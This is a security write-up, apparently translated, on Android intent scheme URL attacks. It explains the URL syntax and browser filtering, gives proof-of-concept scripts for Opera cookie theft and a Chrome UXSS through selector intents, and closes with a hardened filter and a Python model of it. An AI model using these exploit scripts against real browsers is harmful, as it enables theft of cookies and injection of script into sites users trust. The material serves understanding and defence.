Android Intent Scheme URLs attack

Source: Internet
Author: User

0x0 Introduction

Intent-based attacks on Android are well known: they can crash an application and may escalate to privilege abuse. Malicious samples of the ordinary intent-based kind are, however, easy to identify by static feature matching.

More recently a variant has appeared that goes through the Android browser: intent scheme URLs. It takes advantage of missing protection in the browser and uses the browser as a bridge to carry out an intent-based attack indirectly. Compared with an ordinary intent-based attack this is far more covert, and traditional feature matching is useless because the malicious code hides in a web page. In addition, the attack can reach the browser's own components (public or private) and its private files, such as the cookie file, leading to disclosure of confidential user data.


0x1 Use of the intent scheme URL

Let us look at how an intent scheme URL is used:

<script>location.href = "intent:mydata#Intent;action=myaction;type=text/plain;end"</script>

From the usage it is easy to see that this is equivalent to the following Java code:

Intent intent = new Intent("myaction");
// setDataAndType() sets both fields at once; calling setType() after setData() would clear the data again
intent.setDataAndType(Uri.parse("mydata"), "text/plain");

Let us look at another example:

intent://foobar/#Intent;action=myaction;type=text/plain;S.xyz=123;i.abc=678;end

The URL above is equivalent to the following Java code:

Intent intent = new Intent("myaction");
intent.setDataAndType(Uri.parse("//foobar/"), "text/plain");
intent.putExtra("xyz", "123");   // S. prefix: String extra
intent.putExtra("abc", 678);     // i. prefix: int extra

Here the prefix S. denotes a key-value pair of type String and i. a key-value pair of type int.

The Android source provides the static method Intent.parseUri(String uri, int flags), which parses such a URI directly; consult the official source if you want the full syntax.


0x2 Intent Scheme URI parsing and filtering

If a browser supports the intent scheme URI syntax, it generally handles it in three steps:

    1. Parse the URI with Intent.parseUri to obtain the original intent object;
    2. Apply filtering rules to the intent object; different browsers have different policies, described in detail below;
    3. Send the intent through context.startActivityIfNeeded or context.startActivity.

Step 2 plays the key role: missing or defective filtering rules lead to intent scheme URL attacks.

The following is the support status of the major browsers for the intent scheme URL:



All major browsers except Firefox support the intent scheme URL syntax.



0x3 Attack Examples

A. Cookie theft in Opera Mobile

Opera's intent filtering strategy is completely missing, so its private activities can be invoked easily. For example, the following attack:

<script>location.href = "intent:#Intent;S.url=file:///data/data/com.opera.browser/app_opera/cookies;component=com.opera.browser/com.admarvel.android.ads.AdMarvelActivity;end";</script>

With the script above we can directly launch AdMarvelActivity. AdMarvelActivity retrieves the URL from the intent and renders the cookie file as HTML/JavaScript.

Imagine that we set up a malicious web site in advance and lure a user to it in the browser. The malicious page contains the following script:

<script>
// Plant a cookie whose value is an HTML script tag (split so the outer page does not parse it)
document.cookie = "x=<script>(JavaScript code)</scr" + "ipt>; Path=/blah; Expires=Tue, 01-Jan-2030 00:00:00 GMT";
// Have AdMarvelActivity render the cookie file
location.href = "intent:#Intent;S.url=file:///data/data/com.opera.browser/app_opera/cookies;component=com.opera.browser/com.admarvel.android.ads.AdMarvelActivity;end";
</script>

When AdMarvelActivity parses the cookie file, the payload is executed.


B. UXSS in Chrome

Chrome's UXSS exploit is more involved. Before introducing it we need to understand intent selectors (see Intent.setSelector in the Android documentation). In short, the selector mechanism lets a substitute be supplied for the case where the main intent does not match: if A is the main intent and B its selector intent, then on startActivity the system, finding that A cannot be matched, tries to match B instead.

Compared with Opera, Chrome adds a security policy in the intent filtering step, with the following code:

Intent intent = Intent.parseUri(uri, Intent.URI_INTENT_SCHEME);
intent.addCategory("android.intent.category.BROWSABLE");
intent.setComponent(null);
context.startActivityIfNeeded(intent, -1);

The code shows that Chrome imposes several restrictions to defend against intent-based attacks: the category is forced to android.intent.category.BROWSABLE and the component is forced to null, which is much better than Opera. However, Chrome overlooks the use of intent selectors, as in the following:

intent:#Intent;S.xxx=123;SEL;component=com.android.chrome/.xyz;end

Note the keyword SEL: it sets up a selector intent whose component is com.android.chrome/.xyz. Because Chrome's defence only clears the component of the main intent, the selector keeps its explicit component and the defence is rendered ineffective. Finally, here is the PoC for the Chrome UXSS:

<script>
// Through WebappActivity0 we first open the attacked site
location.href = "intent:#Intent;S.webapp_url=http://victim.example.jp;l.webapp_id=0;SEL;component=com.android.chrome/com.google.android.apps.chrome.webapps.WebappActivity0;end";
// Wait 2 s or longer, then inject the JavaScript payload
setTimeout(function () {
    location.href = "intent:#Intent;S.webapp_url=javascript:(malicious JavaScript code);l.webapp_id=1;SEL;component=com.android.chrome/com.google.android.apps.chrome.webapps.WebappActivity0;end";
}, 2000);
</script>

The key point here is how WebappActivity0 handles a new intent (onNewIntent).

The first URL opens the target site and lets it finish loading; the second injects the JavaScript payload directly into the target web page. The vulnerability exists in all Chrome versions below 30.0.1599.92; newer versions changed how WebappActivity handles a new intent so that a new tab is created, which prevents the JavaScript injection.

However, the newer version still does not screen out the use of intent selectors, so the security implications of reading Chrome's private components and files remain.


0x4 Conclusion

From the description of the two vulnerabilities we conclude a relatively safe intent filtering method; the code is as follows:

// Convert the intent scheme URL to an Intent object
Intent intent = Intent.parseUri(uri, Intent.URI_INTENT_SCHEME);
// Forbid launching activities without the BROWSABLE category
intent.addCategory("android.intent.category.BROWSABLE");
// Forbid explicit calls
intent.setComponent(null);
// Forbid intents with a selector intent
intent.setSelector(null);
// Start the activity by the intent
context.startActivityIfNeeded(intent, -1);
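As an added example (not code from the original article, and not Android's Intent.parseUri or any browser's implementation), here is a small Python model of the intent scheme URL grammar described in section 0x1, of the SEL selector trick from section 0x3B, and of the two filters compared above (Chrome's earlier one and the hardened one). The class and function names are assumptions of this example; it reproduces the real parser's keyword and prefix case (S. for String, i. for int, l. for long, the bare SEL item) but only the subset of the syntax the page uses.

```python
"""Model of intent scheme URL parsing and browser-side filtering.

Added example for this page; it is not Android's or any browser's code.
Everything between 'intent:' and '#Intent;' is the data part; the items
after it are name=value pairs ending with 'end'. A bare 'SEL' item switches
to a selector intent, exactly as the page describes.
"""
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, Optional, Set
from urllib.parse import unquote

BROWSABLE = "android.intent.category.BROWSABLE"
ACTION_VIEW = "android.intent.action.VIEW"

# Typed-extra prefixes (subset of what the real parser accepts).
EXTRA_TYPES: Dict[str, Callable[[str], Any]] = {
    "S.": str,                              # String
    "i.": int,                              # int
    "l.": int,                              # long
    "B.": lambda v: v.lower() == "true",    # boolean
}


@dataclass
class Intent:
    action: Optional[str] = None
    data: Optional[str] = None
    type: Optional[str] = None
    component: Optional[str] = None
    categories: Set[str] = field(default_factory=set)
    extras: Dict[str, Any] = field(default_factory=dict)
    selector: Optional["Intent"] = None


def parse_uri(uri: str) -> Intent:
    """Parse 'intent:<data>#Intent;name=value;...;end' into an Intent."""
    if not uri.startswith("intent:"):
        raise ValueError("not an intent scheme URL")
    base = Intent(action=ACTION_VIEW)          # default action, like the real parser
    frag = uri.find("#Intent;")
    end = frag if frag >= 0 else len(uri)
    data = uri[len("intent:"):end]
    if data:
        base.data = data
    if frag < 0:
        return base
    target = base  # items fill the main intent until 'SEL' switches to the selector
    for item in uri[frag + len("#Intent;"):].split(";"):
        if item == "end":
            break
        if item == "SEL":
            target = Intent()
            base.selector = target
            continue
        key, _, value = item.partition("=")
        value = unquote(value)
        if key == "action":
            target.action = value
        elif key == "type":
            target.type = value
        elif key == "category":
            target.categories.add(value)
        elif key == "component":
            target.component = value
        elif key[:2] in EXTRA_TYPES:
            target.extras[key[2:]] = EXTRA_TYPES[key[:2]](value)
        else:
            raise ValueError(f"unsupported item {item!r}")
    return base


def resolved_component(intent: Intent) -> Optional[str]:
    """Explicit target that would be launched: the main intent's component,
    or the selector's component when the main intent has none."""
    if intent.component:
        return intent.component
    if intent.selector is not None:
        return intent.selector.component
    return None


def chrome_filter_old(intent: Intent) -> Intent:
    """Filter of section 0x3B: force BROWSABLE, clear the component, ignore the selector."""
    intent.categories.add(BROWSABLE)
    intent.component = None
    return intent


def hardened_filter(intent: Intent) -> Intent:
    """Filter of section 0x4: additionally drop the selector intent."""
    intent = chrome_filter_old(intent)
    intent.selector = None
    return intent


def launch_target(filter_fn: Callable[[Intent], Intent], uri: str) -> Optional[str]:
    """Component that would be launched after the given filter has run."""
    return resolved_component(filter_fn(parse_uri(uri)))


# Selector URL from section 0x3B (sample values as given on the page).
SELECTOR_URL = "intent:#Intent;S.xxx=123;SEL;component=com.android.chrome/.xyz;end"

if __name__ == "__main__":
    print("old Chrome filter ->", launch_target(chrome_filter_old, SELECTOR_URL))
    print("hardened filter   ->", launch_target(hardened_filter, SELECTOR_URL))
```

Running the script prints the launch target under each filter: the earlier filter still resolves the selector's explicit component, while the hardened filter resolves nothing, which is why setSelector(null) belongs in the filtering step.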

